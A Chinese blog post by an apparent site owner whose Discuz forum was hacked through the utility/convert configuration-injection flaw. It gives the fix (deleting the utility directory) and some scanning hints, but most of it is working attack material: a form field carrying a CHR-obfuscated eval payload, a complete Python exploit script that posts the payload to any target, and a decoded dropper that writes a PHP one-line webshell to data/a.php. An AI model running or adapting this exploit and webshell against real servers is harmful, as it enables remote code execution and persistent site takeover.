手里一个站点被黑了 也就是大概2013-12-20号左右,乌云爆了一个关于discuz安装包中自带升级转化工具配置未过滤得漏洞,当时没有注意,并不认为自己会犯这样的错。 事实狠狠的给了我一个巴掌。在这里我不得不说discuz,360safe,anquan这类的网站实时性很差。
discuz utility 漏洞修复
删除 utility目录即可。
具体漏洞演示:
访问:www.80aj.com/utility/convert/index.php
<input type="text" name="newconfig[aaa eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83). CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]" size="40" value="localhost" />
discuz漏洞 直接黑客利用Python代码:
#coding=utf-8 #Nx4dm1n 2013-12 import httplib, urllib def dzconvertexp(url,vulfile): allvulfile=vulfile+'convert/index.php' target='http://'+url+vulfile page=urllib.urlopen(target) html=page.read() httpresponse=page.getcode() if httpresponse==200: httpClient = None try: params ='a=config&source=d7.2_x2.0&submit=yes&newconfig%5Bsource%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost' print params headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/html"} httpClient = httplib.HTTPConnection(url, 80, timeout=10) httpClient.request("POST",allvulfile, params, headers) response = httpClient.getresponse() print response.getheaders() except Exception, e: print e finally: if httpClient: httpClient.close() else: print 'no' #输入目标url和convert的目录,常见的是/utility/目录,或者就直接是在根目录下 url=raw_input('Input url(No http):') dirm=raw_input('Input the convert directory(ex:/utility/):') dzconvertexp(url,dirm);
//黑客代码 chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59); //转换后的值 fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>'); //其中几个数值是一句话木马必备的 查杀的时候需要分开 chr(101); chr(118); chr(97); chr(108); chr(69); chr(86); chr(65); chr(76);
资料参考:
http://www.myhack58.com/Article/html/3/62/2013/41505.htm
http://www.wooyun.org/bugs/wooyun-2010-014681
http://www.nxadmin.com/penetration/1224.html